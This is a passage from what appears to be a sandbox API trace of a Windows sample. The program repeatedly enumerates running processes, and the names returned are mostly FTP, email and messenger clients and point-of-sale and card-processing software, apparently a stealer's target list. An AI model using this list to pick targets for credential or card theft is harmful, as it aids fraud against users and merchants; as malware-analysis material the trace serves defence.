pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0153.072] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0153.073] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0153.075] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0153.081] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0153.082] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0153.088] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0153.090] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0153.091] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0153.093] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0153.095] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0153.096] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0153.098] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0153.099] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0153.103] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0153.106] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0153.109] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0153.112] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0153.115] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0153.117] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0153.122] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0153.125] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0153.132] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0153.136] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0153.138] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0153.141] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0153.144] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0153.147] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0153.149] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0153.152] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0153.154] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0153.159] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0153.162] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0153.164] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0153.170] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0153.175] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0153.178] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0153.180] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0153.183] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0153.185] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0153.188] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0153.190] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0153.193] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0153.195] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0153.198] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0153.201] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0153.204] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0153.206] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0153.208] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0153.218] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0153.220] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0153.222] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0153.225] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0153.227] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0153.230] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0153.232] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0153.235] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0153.238] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.241] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0153.243] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0153.247] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.250] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.252] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0153.254] Process32Next (in: hSnapshot=0x1a50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0153.267] CloseHandle (hObject=0x1a50) returned 1 [0153.267] Sleep (dwMilliseconds=0x64) [0153.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e70 [0153.402] Process32First (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.405] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.407] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.409] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.411] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.414] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.416] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.418] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.420] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0153.468] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.470] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.473] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0153.475] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.477] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.479] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.482] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.484] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.487] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.489] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.491] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.493] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, 